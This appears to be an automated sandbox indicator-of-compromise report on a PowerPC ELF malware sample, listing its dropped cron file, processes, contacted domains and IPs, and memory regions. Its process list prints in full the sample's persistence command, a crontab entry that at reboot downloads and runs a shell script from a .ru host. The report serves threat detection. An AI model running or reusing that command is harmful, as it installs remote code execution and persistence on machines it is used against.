IOC Report
ppc.elf

loading gif

Files

File Path
Type
Category
Malicious
ppc.elf
ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
initial sample
malicious
/var/spool/cron/crontabs/tmp.gfYg0o
Unknown
dropped
malicious

Processes

Path
Cmdline
Malicious
/tmp/ppc.elf
/tmp/ppc.elf
/tmp/ppc.elf
-
/bin/sh
sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
/bin/sh
-
/bin/sh
-
/usr/bin/crontab
crontab -l
/bin/sh
-
/usr/bin/crontab
crontab -
/tmp/ppc.elf
-
/tmp/ppc.elf
-
/tmp/ppc.elf
-
/tmp/ppc.elf
-
/tmp/ppc.elf
-
/usr/bin/dash
-
/usr/bin/rm
rm -f /tmp/tmp.Tjs0sEmo3a /tmp/tmp.K00P5cWEpn /tmp/tmp.ZeekXPAEm7
/usr/bin/dash
-
/usr/bin/rm
rm -f /tmp/tmp.Tjs0sEmo3a /tmp/tmp.K00P5cWEpn /tmp/tmp.ZeekXPAEm7
There are 7 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://hailcocks.ru/wget.sh;
unknown

Domains

Name
IP
Malicious
kingstonwikkerink.dyn
88.151.195.22

IPs

IP
Domain
Country
Malicious
54.171.230.55
unknown
United States
194.87.198.29
unknown
Russian Federation
81.29.149.178
unknown
Switzerland
109.202.202.202
unknown
Switzerland
91.149.218.232
unknown
Poland
91.189.91.43
unknown
United Kingdom
91.189.91.42
unknown
United Kingdom

Memdumps

Base Address
Regiontype
Protect
Malicious
558c72dac000
page execute and read and write
7f2f08df3000
page read and write
558c72dc2000
page read and write
7f2e1402a000
page read and write
7ffe6974f000
page read and write
7f2e14024000
page read and write
7f2f0992a000
page read and write
7f2f09444000
page read and write
558c73cdf000
page read and write
7f2e14024000
page read and write
7f2f098e5000
page read and write
7ffe697aa000
page execute read
558c72dac000
page execute and read and write
7f2e1402a000
page read and write
7f2f098e5000
page read and write
7f2f09444000
page read and write
7f2f085e2000
page read and write
7f2f098dd000
page read and write
7f2f04000000
page read and write
7f2f08df3000
page read and write
7f2f0992a000
page read and write
7f2f09082000
page read and write
7f2f097b4000
page read and write
7f2f09469000
page read and write
7f2e14014000
page execute read
7f2f04000000
page read and write
7ffe697aa000
page execute read
558c70da6000
page read and write
558c73cdf000
page read and write
7f2f085e2000
page read and write
558c72dc2000
page read and write
558c70b23000
page execute read
7f2f04021000
page read and write
7f2f098dd000
page read and write
7f2f09082000
page read and write
7f2f08de5000
page read and write
7f2f04021000
page read and write
558c70dae000
page read and write
558c70b23000
page execute read
7f2f08de5000
page read and write
7f2f097b4000
page read and write
558c70dae000
page read and write
7f2e14014000
page execute read
7f2f09469000
page read and write
7ffe6974f000
page read and write
558c70da6000
page read and write
There are 36 hidden memdumps, click here to show them.